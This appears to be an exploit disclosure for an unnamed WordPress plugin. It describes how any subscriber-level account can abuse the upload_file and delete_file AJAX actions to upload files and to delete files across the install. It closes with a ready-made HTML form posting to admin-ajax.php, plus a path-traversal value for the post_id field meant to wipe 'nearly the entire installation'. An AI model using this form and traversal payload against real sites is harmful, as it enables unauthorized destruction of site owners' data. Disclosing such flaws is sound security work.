Affected AJAX actions: upload_file and delete_file. To get the nonce, search for uploader_nonce in the dashboard.
The following actions can be triggered with any authenticated user. All listed actions were triggered with a subscriber account.
1. Restricted file upload.
2. Data deletion over upload process
The upload function contains a bug, which allows to delete every file ( excluding directories and files with a leading dot ), which can be deleted by the executing user ( in my case www-data ). This bug can be used to delete nearly a whole wp installation. ( blank directory structure will remain )
3. Direct files deletion
The delete_file function can be used to obtains identical results as described in 2.
You can use the following html form:
<form action="<your host here>/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
<input type="text" name="action" value="" placeholder="upload_file or delete_file">
<input type="text" name="nonce" value="" placeholder="your nonce here">
use post_id values to create a directory. Dont use it for path traversal, if you want to successful upload a file. To wipe nearly the entire installation use eg. ../../../../../../../../../../
The uploaded file will be stored inside the directory specified in post_id.
<input type="text" name="post_id" value="" placeholder="">
Your html file.
<input type="file" name="file-upload" value="upload">
<!-- the following element is used for the delete_file function call. -->
<!-- before unlink is called a file_exists check is performed. -->
<input type="text" name="filename" placeholder="valid target file" >
<input type="submit" value="submit" >